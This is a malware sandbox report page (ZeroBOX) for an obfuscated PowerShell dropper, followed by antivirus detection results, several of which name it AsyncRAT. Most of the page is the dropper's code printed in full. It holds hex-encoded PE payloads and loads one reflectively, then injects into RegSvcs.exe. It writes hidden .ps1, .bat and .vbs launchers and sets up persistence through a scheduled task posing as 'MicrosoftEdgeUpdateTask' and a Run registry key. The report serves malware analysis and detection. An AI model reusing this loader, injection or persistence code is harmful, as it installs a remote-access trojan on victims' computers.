popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$Content = @'
$Mordexstring_ojj = "4D%&%5A%&%90%&%00%&%03%&%00%&%00%&%00%&%04%&%00%&%00%&%00%&%FF%&%FF%&%00%&%00%&%B8%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%40%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%80%&%00%&%00%&%00%&%0E%&%1F%&%BA%&%0E%&%00%&%B4%&%09%&%CD%&%21%&%B8%&%01%&%4C%&%CD%&%21%&%54%&%68%&%69%&%73%&%20%&%70%&%72%&%6F%&%67%&%72%&%61%&%6D%&%20%&%63%&%61%&%6E%&%6E%&%6F%&%74%&%20%&%62%&%65%&%20%&%72%&%75%&%6E%&%20%&%69%&%6E%&%20%&%44%&%4F%&%53%&%20%&%6D%&%6F%&%64%&%65%&%2E%&%0D%&%0D%&%0A%&%24%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%50%&%45%&%00%&%00%&%4C%&%01%&%03%&%00%&%76%&%6A%&%7A%&%64%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%E0%&%00%&%02%&%01%&%0B%&%01%&%08%&%00%&%00%&%FC%&%00%&%00%&%00%&%0A%&%00%&%00%&%00%&%00%&%00%&%00%&%3E%&%1A%&%01%&%00%&%00%&%20%&%00%&%00%&%00%&%20%&%01%&%00%&%00%&%00%&%40%&%00%&%00%&%20%&%00%&%00%&%00%&%02%&%00%&%00%&%04%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%04%
$RoXstring_lla = "4D%&%5A%&%90%&%00%&%03%&%00%&%00%&%00%&%04%&%00%&%00%&%00%&%FF%&%FF%&%00%&%00%&%B8%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%40%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%80%&%00%&%00%&%00%&%0E%&%1F%&%BA%&%0E%&%00%&%B4%&%09%&%CD%&%21%&%B8%&%01%&%4C%&%CD%&%21%&%54%&%68%&%69%&%73%&%20%&%70%&%72%&%6F%&%67%&%72%&%61%&%6D%&%20%&%63%&%61%&%6E%&%6E%&%6F%&%74%&%20%&%62%&%65%&%20%&%72%&%75%&%6E%&%20%&%69%&%6E%&%20%&%44%&%4F%&%53%&%20%&%6D%&%6F%&%64%&%65%&%2E%&%0D%&%0D%&%0A%&%24%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%50%&%45%&%00%&%00%&%4C%&%01%&%03%&%00%&%3F%&%32%&%26%&%90%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%E0%&%00%&%0E%&%21%&%0B%&%01%&%30%&%00%&%00%&%22%&%01%&%00%&%00%&%06%&%00%&%00%&%00%&%00%&%00%&%00%&%4E%&%40%&%01%&%00%&%00%&%20%&%00%&%00%&%00%&%60%&%01%&%00%&%00%&%00%&%40%&%00%&%00%&%20%&%00%&%00%&%00%&%02%&%00%&%00%&%04%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%06%&%0
Sleep 5
[Byte[]] $NKbb = $Mordexstring_ojj -split '%&%' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
[Byte[]] $pe = $RoXstring_lla -split '%&%' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
Sleep 5
$HM = 'L####################################################################################################################################################################################################o######################################################################################################a##################################################################################################################################################################################################################################################################################################################################################################################################d' -replace '#', ''
$Fu = [Reflection.Assembly]::$HM($pe)
$NK = $Fu.GetType('N#################################################################################################################################################################################################e####################################################w#####################################################################################################################################################################################################################################################################################################################################################################################################################################################PE##############################################################################################################################################################################################################################################################################################################################
$MZ = $NK.GetMethod('Execute')
$NA = 'C:\W#################################################################################################################################################in#################################################################################################################################################do#######w################################################################################################################################################################################################################################################################################################s\Mi###########################################################################################################################################################################################################################################################cr'-replace '#', ''
$AC = $NA + 'os##################################################of#####t.N#######E#######T\F#######ra###mew#######ork\v4.0.303###19\R##eg#######Svc#####s.e####################################################################################################x###########################################################################################################e'-replace '#', ''
$VA = @($AC, $NKbb)
$CM = 'I########################################################################################################n#####################################################v########################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################o####################################################k###########################################################################################################################################################################################################################################################################################################################
$EY = $MZ.$CM($null, [object[]] $VA)
[IO.File]::WriteAllText("C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1", $Content)
$Content = @'
@e%k9vZGpST29kalJPb2RqUk9vZ%%k9vZGpST29kalJPb2RqUk9vZ% off
set "ps=powershell.exe"
set "k9vZGpST29kalJPb2RqUk9vZms=-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"
set "cmd=C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1"
%ps% %k9vZGpST29kalJPb2RqUk9vZms% -Command "& '%cmd%'"
exit /b
[IO.File]::WriteAllText("C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat", $Content)
$Content = @'
Function CreateWshShellObj()
On Error GoTo 0 ' Ensure error handling is active
Dim objName
objName = "WScript.Shell"
Set CreateWshShellObj = CreateObject(objName)
End Function
Function GetFilePath()
Dim filePath
filePath = "C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat"
GetFilePath = filePath
End Function
Function GetVisibilitySetting()
Dim visibility
visibility = 0 ' 0
GetVisibilitySetting = visibility
End Function
Function RunFile(wshShellObj, filePath, visibility)
If Not IsEmpty(filePath) And CreateObject("Scripting.FileSystemObject").FileExists(filePath) Then
wshShellObj.Run filePath, visibility
Else
WScript.Echo "File not found or path is empty."
End If
End Function
Set wshShellObj = CreateWshShellObj()
filePath = GetFilePath()
visibility = GetVisibilitySetting()
Call RunFile(wshShellObj, filePath, visibility)
[IO.File]::WriteAllText("C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs", $Content)
# Sleep 2 seconds
Start-Sleep -Seconds 2
# Function to create the scheduled task
function Create-ScheduledTask {
$scheduler = New-Object -ComObject Schedule.Service
$scheduler.Connect()
$taskDefinition = $scheduler.NewTask(0)
$taskDefinition.RegistrationInfo.Description = "Runs a script every 2 minutes"
$taskDefinition.Settings.Enabled = $true
$taskDefinition.Settings.DisallowStartIfOnBatteries = $false
$trigger = $taskDefinition.Triggers.Create(1) # 1 = TimeTrigger
$trigger.StartBoundary = [DateTime]::Now.ToString("yyyy-MM-ddTHH:mm:ss")
$trigger.Repetition.Interval = "PT2M"
$action = $taskDefinition.Actions.Create(0) # 0 = ExecAction
$action.Path = "C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs"
$taskFolder = $scheduler.GetFolder("\")
$taskFolder.RegisterTaskDefinition("MicrosoftEdgeUpdateTask", $taskDefinition, 6, $null, $null, 3)
# Check if the scheduled task exists, if not, create it
function Ensure-ScheduledTaskExists {
$taskName = "MicrosoftEdgeUpdateTask"
$scheduler = New-Object -ComObject Schedule.Service
$scheduler.Connect()
$taskFolder = $scheduler.GetFolder("\")
try {
$task = $taskFolder.GetTask($taskName)
Write-Host "Task found."
} catch {
Write-Host "Task not found. Creating task..."
Create-ScheduledTask
# Ensure the task is created
Ensure-ScheduledTaskExists
# Add script to registry to run at startup
$regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Set-ItemProperty -Path $regPath -Name "RunScheduledTask" -Value "powershell.exe -ExecutionPolicy Bypass -File `"$MyInvocation.MyCommand.Path`""
# Exit script
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.GenericKD.73270264
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 a variant of Generik.DCMMTQW
TrendMicro-HouseCall Backdoor.PS1.ASYNCRAT.YXEFXZ
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Trojan.GenericKD.73270264
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.73270264
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Trojan.GenericKD.73270264
TrendMicro Backdoor.PS1.ASYNCRAT.YXEFXZ
FireEye Trojan.GenericKD.73270264
Emsisoft Trojan.GenericKD.73270264 (B)
GData Trojan.GenericKD.73270264
Jiangmin Clean
Varist ABTrojan.QPYO-
Avira Clean
MAX malware (ai score=88)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D45E03F8
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Casdet!rfn
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Trojan.Undefined!8.1327C (TOPIS:E0:fPZYvCxD07)
Yandex Clean
Ikarus Trojan-Dropper.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Trojan:Unknow/Casdet.Gen
No IRMA results available.